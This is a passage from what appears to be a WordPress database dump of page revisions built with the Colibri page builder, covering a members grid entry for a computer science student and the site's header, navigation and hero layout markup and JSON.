52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c237-outer\">\n            <div data-colibri-id=\"182-c237\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c237 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c238\" class=\"d-block style-913 style-local-182-c238 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\" class=\"wp-image-1763 style-913-image style-local-182-c238-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c238-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c239\" class=\"h-global-transition-all h-heading style-914 style-local-182-c239 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c239\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c240\" class=\"h-text h-text-component style-915 style-local-182-c240 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c241\" class=\"style-917 style-local-182-c241 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2024-11-07 14:20:44','2024-11-07 19:20:44','',182,'https://gsudice.dataconn.net/?p=1862',0,'revision','',0),(1863,1,'2024-11-07 14:20:45','2024-11-07 19:20:45','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2024-11-07 14:20:45','2024-11-07 19:20:45','',26,'https://gsudice.dataconn.net/?p=1863',0,'revision','',0),(1864,1,'2024-11-07 14:20:45','2024-11-07 19:20:45','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto 